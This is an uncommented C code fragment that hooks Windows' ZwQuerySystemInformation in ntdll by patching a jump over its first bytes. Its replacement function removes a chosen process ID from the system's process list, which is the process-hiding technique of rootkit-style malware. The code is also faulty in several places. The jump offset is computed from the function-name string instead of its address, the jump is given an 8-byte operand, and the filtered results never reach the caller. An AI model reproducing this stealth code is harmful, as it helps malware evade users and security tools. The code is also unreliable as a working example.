```c
BOOL FunHook(LPCSTR OldFunName,LPVOID lpNewFun,PBYTE OldData,PBYTE NewData,LPCWSTR szModule)
{
DWORD dwProtect;
LONGLONG dwRelative;
byte pbuf[9]={0xe9,0,};
PBYTE pByte;
LPVOID lpZwQuerySystemInformation=GetProcAddress(GetModuleHandle(szModule),OldFunName);
pByte=(PBYTE)lpZwQuerySystemInformation;
if (pByte[0]==0xe9)
{
MESSAGEBOX(L"The Fun has been hooked!");
return FALSE;
}
if (!lpZwQuerySystemInformation)
{
MESSAGEBOX(L"Fun Hook Failed");
return FALSE;
}
if (!NewData||!OldData){MESSAGEBOX(L"Data parameter transmission error!");return FALSE;}
VirtualProtect(lpZwQuerySystemInformation,9,PAGE_EXECUTE_READWRITE,&dwProtect);
MESSAGEBOX(L"VirtualProtect ");
memcpy(OldData,pByte,9);
NewData[0]=0xe9;
dwRelative=(LONGLONG)lpNewFun-(LONGLONG)OldFunName+9;
memcpy(NewData+1,&dwRelative,8);
memcpy(pByte,NewData,9);
VirtualProtect(lpZwQuerySystemInformation,9,dwProtect,&dwProtect);
MESSAGEBOX(L"VirtualProtect Finished");
return TRUE;
}
NTSTATUS NewZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInfoemationLength,
PULONG ReturnLength) //新函数
{
NTSTATUS status;
DWORD dwSizeNeed;
LPVOID lpZwQuerySystemInformation=GetProcAddress(GetModuleHandle(L"ntdll.dll"),"ZwQuerySystemInformation");
status=FunUnhook("ZwQuerySystemInformation",NewZwQuerySystemInformation,lpOldData,L"ntdll.dll");
status=((ZWQUERYSYSTEMINFORMATION)lpZwQuerySystemInformation)(SystemProcessesAndThreadsInformation,NULL,0,&dwSizeNeed);
if (status==0xc0000004)
{
MESSAGEBOX(L"进入if (status==0xc0000004)");
PSYSTEM_PROCESS_INFORMATION proar,pforward;
BYTE *buffer=new BYTE[dwSizeNeed];
status=((ZWQUERYSYSTEMINFORMATION)lpZwQuerySystemInformation)(SystemProcessesAndThreadsInformation,(PVOID)buffer,dwSizeNeed,NULL);
if (status==0)
{
proar = (PSYSTEM_PROCESS_INFORMATION)buffer;
do {
proar=(PSYSTEM_PROCESS_INFORMATION)((LONGLONG)proar+proar->NextEntryOffset);
if ((DWORD)proar->UniqueProcessId==dwProcessid)
{
if (proar->NextEntryOffset==0)
{
pforward->NextEntryOffset=0;
}else
{
pforward->NextEntryOffset+=proar->NextEntryOffset;
}
}
pforward=proar;
if (proar->NextEntryOffset==0)
{
break;
}
proar=(PSYSTEM_PROCESS_INFORMATION)((LONGLONG)proar+proar->NextEntryOffset);
} while ( proar->NextEntryOffset != 0 );
}
delete []buffer;
buffer=NULL;
}
FunHook("ZwQuerySystemInformation",NewZwQuerySystemInformation,lpOldData,lpNewData,L"ntdll.dll");
return status;
}
```